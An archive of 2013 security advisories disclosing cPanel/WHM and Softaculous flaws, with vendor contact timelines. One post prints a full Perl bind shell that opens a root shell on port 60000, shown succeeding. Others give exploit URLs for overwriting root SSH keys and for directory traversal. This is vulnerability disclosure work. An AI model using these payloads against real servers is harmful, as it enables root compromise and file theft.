Archive for May, 2013

cPanel – Reset Root SSH Key (R911-0004)

Monday, May 13th, 2013

Type: Authentication Bypass
Impact: Medium
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.36.1.5 and earlier.
Fixed Version: 11.38.0.7
CVE: -
R911: 0004
Date: 2013-05-13
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

WHM fails to restrict access to the Root SSH Key manager and allows a malicious user to generate a new key under /root/.ssh/ and overwrite an existing key if the file name is known or if .id_dsa is used by default.

Proof of Concept:

1. Log into WHM using a reseller account.

2. Open the following URL after the WHM session:

/scripts2/ssh_addkey
/scripts2/ssh_doaddkey?name=&pass=PASSWORD&password2=PASSWORD&type=dsa&keysize=1024

Impact:

We have deemed this vulnerability to be rated as MEDIUM due to the fact that private keys under /root/.ssh/ can be overwritten. Right now it is not possible to use a private key generated by this exploit to gain access.

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.36.1.5.

Fixed Version:

This vulnerability was patched in version 11.38.0.7 or possibly a few builds earlier, we’re not sure since cPanel stopped communicating with us regarding the matter and decided to silently fix. All users are urged to upgrade as soon as possible.

Vendor Contact Timeline:

2013-05-04: Vendor contacted via email.
2013-05-06: Vendor confirms vulnerability.
2013-05-10: Vendor issues v11.38.0.7 update.
2013-05-13: Rack911 issues security advisory.

cPanel – Fundamental Security Failure

Monday, May 13th, 2013

Type: Fundamental Security Failure
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: All
Date: 2013-05-13
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

This is not a vulnerability in the software itself but instead a discussion of how WHM trusts all third party plugins with root level access which is a dangerous practice. For example, when a reseller logs into WHM and accesses a plugin it is then executed as root. Should a vulnerability exist in a plugin that is accessible to the reseller, it would then be trivial for the attacker to gain instant root access. This has been brought to cPanel’s attention as early as 2009 when several security flaws were found in popular third party plugins that allowed instant root access. Had we published these security flaws back then it would be safe to assume that at least 8 out of 10 hosting companies using cPanel would have been vulnerable to root compromises.

When we expressed our concerns to cPanel both in 2009 and earlier this month, their response was basically “not our problem” which we believe to be a terrible and reckless approach to security. It’s of cPanel’s opinion that despite admitting that WHM runs everything as root that it’s up to the third party developers to maintain a secure code base and what happens after that is not their problem. While we do agree that the third party developers share a responsibility, it is ultimately cPanel’s platform that allows a small flaw to become a big flaw. Think of it like this, cPanel is saying “Sure we run PHP as root but it’s not our fault that WordPress had a flaw that allowed the server to get rooted.” Of course everyone knows how dangerous it is to run PHP as root but that is effectively what cPanel is doing here.

As much as we would like to see WHM rewritten from scratch to prevent  these sorts of attacks, we know that’s not practical. Instead, what we would like to see is a mechanism using ACL’s or a wrapper of sorts that will execute third party plugins in a sand boxed environment. Something where if a third party plugin is found to have a vulnerability that root access cannot be obtained under any circumstances.

We shared our ideas with cPanel and they were immediately shot down with irrelevant examples of why it cannot work. It is our opinion that properly securing WHM from these sorts of attacks would not take a lot
of effort but instead cPanel has a pattern of deflecting blame when it comes to security and we find that very chilling.

Make no mistake about it, anyone who uses cPanel should be concerned right now. There have been very real security flaws over the years that could have allowed an attacker to take over any cPanel server in a
matter of seconds because of these fundamental security failures. It is our goal to bring public attention to this issue and put pressure on cPanel to implement any necessary changes.

Proof of Concept:

The following is from an old exploit that has since been fixed but could easily apply to any future vulnerability in third party plugins. In this case, the proof of concept is from an RVSiteBuilder exploit that we

manipulated to drop to an instant root shell.

RVSiteBuilder stored user uploads in world writable directories located under a directory accessible via WHM:

/usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilder/userdata/reseller/upload/

In that directory we were able to create a file called exploit.cgi and used a simple Perl bindshell that would open port 60000 and drop to a root prompt when executed. For reference sake, here is a copy of that
bind shell:

#!/usr/bin/perl
#
# exploit.cgi
#
BEGIN {
unshift(@INC, '/usr/local/cpanel');
}
use Socket;
$port   = 60000;
$proto  = getprotobyname('tcp');
$cmd= "exploit";
$system = '/bin/sh -i';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN)   or die "listen: $!";
for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
{
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
EOF

After we created exploit.cgi the next step was to log into WHM as the reseller and open the URL directly containing the bind shell. In this case it would have been:

https://domain.com:2087/cgi/rvsitebuilder/userdata/reseller/upload/exploit.cgi

Once we opened that URL, the bindshell was executed as root and now a bindshell running on port 60000 was waiting for us:

telnet domain.com 60000
Connected to domain.com.
Escape character is ‘^]’.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)

Should this be allowed to happen? Absolutely not! We cannot stress enough how much of a failure this is on cPanel’s part to trust every third party plugin with root access. Any reseller on that server could have created that exploit.cgi via SSH, a cron job or through many other means and gained instantaneous root access to do as they please.

Impact:

We have deemed this fundamental security failure to be rated as HIGH due to the fact that any third party plugin that is compromised will ultimately lead to a root compromise. At best, the attackers will only

have root read access to view sensitive files, but at worst the attackers will have the ability to use a Perl bind shell to drop to an instant root shell.

Softaculous – Privilege Escalation (R911-0003)

Tuesday, May 7th, 2013

Type: Privilege Escalation
Impact: Critical
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.1, 4.2.2 and 4.2.3
Fixed Version: 4.2.4
CVE: -
R911: 0003
Date: 2013-05-07
By: Rack911, Avi Brender (www.elitehosts.com), and streaky

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker can manipulate a SUID binary that is installed by Softaculous to escalate their privileges to root access.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as CRITICAL due to the fact that this exploit can lead to an instant root bind shell and can be executed by all users on the server – not just resellers. The exploit can also be executed via SSH, cron, CGI scripts and/or PHP scripts.

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.3 for cPanel but is also believed to exist under other control panels.

Fixed Version:

This vulnerability was patched in version v4.2.4.

Vendor Contact Timeline:

2013-05-07: Vendor contacted via email.
2013-05-07: Vendor confirms vulnerability.
2013-05-07: Vendor issues v4.2.4 update.
2013-05-07: Rack911 issues security advisory.

Softaculous – Directory Traversal (Root Access) (R911-0002)

Monday, May 6th, 2013

Type: Directory Traversal (Root Access)
Impact: Critical
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.2
Fixed Version: 4.2.3
CVE: -
R911: 0002
Date: 2013-05-06
By: http://www.rack911.com

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker posing as a reseller can access Softaculous via WHM and using a certain URL open the error page that is supposed to be restricted to root users.

By default the error page will open a log file called error_log.log under the scripts directory, however an attacker can force the error page to read and/or delete any file on the server due to a fundamental flaw in WHM that allows plugins to be executed as root.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We have deemed this vulnerability to be rated as CRITICAL due to the fact that Softaculous when accessed via WHM is done so as root and can read any file regardless of ownership. (The error page will also allow the attacker the ability to wipe any file which could potentially render a server inoperable.)

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.2 for cPanel but is also confirmed to work under InterWorx with some slight changes to the exploit code.

Fixed Version:

This vulnerability was patched in version v4.2.3.

Vendor Contact Timeline:

2013-05-03: Vendor contacted via email.
2013-05-04: Vendor confirms vulnerability.
2013-05-06: Vendor issues v4.2.3 update.
2013-05-06: Rack911 issues security advisory.

Softaculous – Directory Traversal (R911-0001)

Monday, May 6th, 2013

Type: Directory Traversal
Impact: Low
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.2
Fixed Version: 4.2.3
CVE: -
R911: 0001
Date: 2013-05-06
By: https://www.rack911.com

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker can access Softaculous via cPanel and manipulate the backup feature to download system files by using a basic directory traversal.

Proof of Concept:

1. Log into cPanel using a standard account.

2. Open the following URL after the cPanel session:

/frontend/x3/softaculous/index.live.php?act=backups&download=../../../../../../etc/hosts

Note: The length of the directory traversal will depend on where the scripts directory is located. You may have to add additional ../’s for this attack to work.

Impact:

We have deemed this vulnerability to be rated as LOW due to the fact that Softaculous when accessed via cPanel is done so as the user and thus limits the scope of what files can be downloaded.

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.2 for cPanel but is also confirmed to work under InterWorx with some slight changes to the exploit code.

Fixed Version:

This vulnerability was patched in version v4.2.3.

Vendor Contact Timeline:

2013-05-03: Vendor contacted via email.
2013-05-04: Vendor confirms vulnerability.
2013-05-06: Vendor issues v4.2.3 update.
2013-05-06: Rack911 issues security advisory.